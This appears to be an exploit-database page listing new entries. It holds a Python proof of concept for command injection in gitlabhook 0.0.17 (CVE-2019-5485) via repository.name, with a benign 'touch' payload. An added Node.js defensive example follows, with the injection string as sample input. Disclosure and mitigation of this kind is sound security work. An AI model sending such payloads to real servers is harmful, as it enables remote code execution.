
10 changes to exploits/shellcodes

SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service
Easy File Sharing Web Server 7.2 - 'New User' Local SEH Overflow
ABRT - sosreport Privilege Escalation (Metasploit)
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection
Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistent Cross-Site Scripting
WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting
NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
YzmCMS 5.3 - 'Host' Header Injection
18 lines
No EOL
503 B
Text
# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
# Version: 0.0.17
# Tested on: Kali Linux 2, Windows 10.
# CVE : CVE-2019-5485

#!/usr/bin/python

import requests

target = "http://TARGET:3420"
cmd = r"touch /tmp/poc.txt"
json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
r = requests.post(target, json)

print "Done."
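
The payload above closes a single-quoted shell argument from inside `repository.name`. The following is an added defensive example, not part of the original exploit file and not gitlabhook's own code: it assumes a hypothetical Node.js webhook receiver that passes the repository name to a script, allow-lists the name, and hands it to `execFile` as a separate argument so that no shell parses it. The names `validateRepoName`, `buildHookArgv`, `runHook` and `triage` and the sample bodies are constructed for illustration.

```javascript
// Added defensive example. The handler shape and all names here are assumptions,
// not code from the gitlabhook package.

// Allow-list: start with an alphanumeric, then letters, digits, '.', '_' or '-'.
const SAFE_REPO_NAME = /^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$/;

// Validate repository.name from a parsed webhook body.
function validateRepoName(payload) {
  const name = payload && payload.repository && payload.repository.name;
  if (typeof name !== 'string') return { ok: false, reason: 'missing-or-non-string' };
  if (!SAFE_REPO_NAME.test(name)) return { ok: false, reason: 'disallowed-characters' };
  return { ok: true, name };
}

// Build an argument vector; the name is one argv element, never part of a shell string.
function buildHookArgv(payload, script) {
  const v = validateRepoName(payload);
  if (!v.ok) throw new Error('webhook rejected: ' + v.reason);
  return { file: script, args: [v.name] };
}

// Run the hook script without a shell. Not called when this file is loaded.
function runHook(payload, script, callback) {
  const { execFile } = require('child_process');
  const { file, args } = buildHookArgv(payload, script);
  return execFile(file, args, { shell: false, timeout: 30000 }, callback);
}

// Triage raw request bodies the way a receiver or a log review would.
function triage(rawBodies) {
  return rawBodies.map((raw) => {
    let parsed;
    try { parsed = JSON.parse(raw); } catch (e) { return 'reject:invalid-json'; }
    const v = validateRepoName(parsed);
    return v.ok ? 'accept:' + v.name : 'reject:' + v.reason;
  });
}

// Constructed sample bodies; the second has the shape of the PoC request above.
const SAMPLE_BODIES = [
  '{"repository":{"name":"my-project.v2"}}',
  '{"repository":{"name":"Diasporrra\'; touch /tmp/poc.txt;\'"}}',
  '{"repository":{"name":["not","a","string"]}}',
  '{"repository":',
];
console.log(triage(SAMPLE_BODIES));
```

Rejections from `triage` are worth logging with the source address, since a legitimate GitLab instance does not send repository names containing quotes or semicolons.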